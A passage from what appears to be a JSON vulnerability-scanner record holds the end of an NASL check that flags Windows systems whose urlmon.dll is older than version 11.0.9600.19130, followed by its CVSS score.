exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"11.0.9600.19130\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\urlmon.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 11.0.9600.19130\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}